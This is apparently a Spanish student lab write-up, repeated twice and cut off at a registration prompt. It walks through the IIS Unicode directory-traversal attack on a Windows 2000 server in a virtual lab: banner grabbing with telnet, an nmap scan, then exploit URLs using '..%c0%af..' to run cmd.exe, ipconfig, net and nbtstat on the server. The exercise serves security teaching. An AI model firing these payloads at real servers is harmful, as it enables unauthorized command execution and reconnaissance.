Ataque_UNICODE
Páginas: 2 (428 palabras)
Publicado: 7 de octubre de 2014
2SIMIXT
ATAQUE UNICODE
Realizaremos el ataque hacia un servidor ”Windows 2k”, para ello lo instalaremos en el
VMWare.
Se quiere emular el escenario del siguiente esquema.
Windows Server2000
Una vez instalado, hacemos un ping para comprobar conectividad entre ambas máquinas.
Ping del W2k al XP
Delgado | 2SIMIXT
1
2SIMIXT
ATAQUE UNICODE
Ahora vamos al XP, abrimos elcmd y ponemos “telnet+IPServidor+puerto” En este caso el
comando será: telnet 192.168.23.191 80. Damos 2 veces intro, y nos aparecerá la información
del Server.
Una vez cogida la info de laversión, instalaremos el NMAP en el Cliente.
Iniciamos i hacemos los siguiente; En “Target” la IP del servidor, en “Profile” Intense Scan. Y
finalmente le damos a SCAN para que haga un barrido de puertos.Ferran Salas & Felix Delgado | 2SIMIXT
2
2SIMIXT
ATAQUE UNICODE
Ahora empezamos a recolectar información del servidor.
En el navegador del cliente pondremos (siempre será nuestrocaso):
http://192.168.23.191/scripts/..%c0%af../windows/system32/cmd.exe?+/c+dir+c:\
Nos mostrará todos los directorios del C:\
Después en el navegador otra vez ponemos:http://192.168.23.191/scripts/..%c0%af../windows/system32/ipconfig.exe?+/all
Y nos aparecerá la configuración de red del servidor.
Ferran Salas & Felix Delgado | 2SIMIXT
3
2SIMIXT
ATAQUE UNICODE
Volvemos alnavegador y seguiremos con:
http://192.168.23.191/scripts/..%c0%af../windows/system32/net.exe?+view
Nos muestra los usuarios activos que están conectados al server.
En el siguiente paso:http://192.168.23.191/scripts/..%c0%af../windows/system32/net.exe?+view+\\192.168.23.191
A nosotros nos dio error CGI.
Ferran Salas & Felix Delgado | 2SIMIXT
4
2SIMIXT
ATAQUE UNICODE
Ahoraponemos:
http://192.168.23.191/scripts/..%c0%af../windows/system32/nbtstat.exe?+”-a”+192.168.23.191
Nos muestra todos los usuarios que están en la red local.
Aquí deberemos instalar el TFTP en...
ATAQUE UNICODE
Realizaremos el ataque hacia un servidor ”Windows 2k”, para ello lo instalaremos en el
VMWare.
Se quiere emular el escenario del siguiente esquema.
Windows Server2000
Una vez instalado, hacemos un ping para comprobar conectividad entre ambas máquinas.
Ping del W2k al XP
Delgado | 2SIMIXT
1
2SIMIXT
ATAQUE UNICODE
Ahora vamos al XP, abrimos elcmd y ponemos “telnet+IPServidor+puerto” En este caso el
comando será: telnet 192.168.23.191 80. Damos 2 veces intro, y nos aparecerá la información
del Server.
Una vez cogida la info de laversión, instalaremos el NMAP en el Cliente.
Iniciamos i hacemos los siguiente; En “Target” la IP del servidor, en “Profile” Intense Scan. Y
finalmente le damos a SCAN para que haga un barrido de puertos.Ferran Salas & Felix Delgado | 2SIMIXT
2
2SIMIXT
ATAQUE UNICODE
Ahora empezamos a recolectar información del servidor.
En el navegador del cliente pondremos (siempre será nuestrocaso):
http://192.168.23.191/scripts/..%c0%af../windows/system32/cmd.exe?+/c+dir+c:\
Nos mostrará todos los directorios del C:\
Después en el navegador otra vez ponemos:http://192.168.23.191/scripts/..%c0%af../windows/system32/ipconfig.exe?+/all
Y nos aparecerá la configuración de red del servidor.
Ferran Salas & Felix Delgado | 2SIMIXT
3
2SIMIXT
ATAQUE UNICODE
Volvemos alnavegador y seguiremos con:
http://192.168.23.191/scripts/..%c0%af../windows/system32/net.exe?+view
Nos muestra los usuarios activos que están conectados al server.
En el siguiente paso:http://192.168.23.191/scripts/..%c0%af../windows/system32/net.exe?+view+\\192.168.23.191
A nosotros nos dio error CGI.
Ferran Salas & Felix Delgado | 2SIMIXT
4
2SIMIXT
ATAQUE UNICODE
Ahoraponemos:
http://192.168.23.191/scripts/..%c0%af../windows/system32/nbtstat.exe?+”-a”+192.168.23.191
Nos muestra todos los usuarios que están en la red local.
Aquí deberemos instalar el TFTP en...
Leer documento completo
Regístrate para leer el documento completo.